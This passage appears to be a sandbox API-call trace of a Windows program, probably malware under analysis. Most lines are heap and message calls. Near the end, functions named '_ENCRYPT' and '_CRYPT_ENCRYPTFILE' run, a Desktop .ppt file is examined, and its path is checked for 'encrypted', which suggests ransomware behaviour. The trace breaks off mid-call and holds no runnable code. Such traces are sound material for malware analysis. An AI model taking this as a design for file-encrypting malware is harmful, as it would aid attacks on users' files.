[0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0029.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0029.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.793] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 1 [0029.793] TranslateMessage (lpMsg=0x6aedfc) returned 0 [0029.793] DispatchMessageW (lpMsg=0x6aedfc) returned 0x0 [0029.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.793] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae498) returned 1 [0029.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.797] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0029.797] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0029.798] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0029.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0029.798] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0029.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0029.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.799] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.799] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0029.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0029.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ccd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.800] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0029.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.800] CloseHandle (hObject=0x140) returned 1 [0029.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0029.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0029.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.800] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.801] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.801] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0029.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.801] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.801] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.801] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0029.801] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.801] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0029.801] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0029.801] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.801] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.801] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.801] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.801] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.801] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.801] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9391a0, ftCreationTime.dwHighDateTime=0x1d5be95, ftLastAccessTime.dwLowDateTime=0xad969250, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0xad969250, ftLastWriteTime.dwHighDateTime=0x1d5bb7d, nFileSizeHigh=0x0, nFileSizeLow=0x6546, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AUOmEUF.ppt", cAlternateFileName="")) returned 0x7c20c0 [0029.801] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.801] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.802] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa9391a0, ftCreationTime.dwHighDateTime=0x1d5be95, ftLastAccessTime.dwLowDateTime=0xad969250, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0xad969250, ftLastWriteTime.dwHighDateTime=0x1d5bb7d, nFileSizeHigh=0x0, nFileSizeLow=0x6546, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AUOmEUF.ppt", cAlternateFileName="")) returned 0x7c20c0 [0029.802] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.802] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.802] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AUOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UOmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OmEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mEUF.ppt\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.803] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.803] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0029.804] CharUpperBuffW 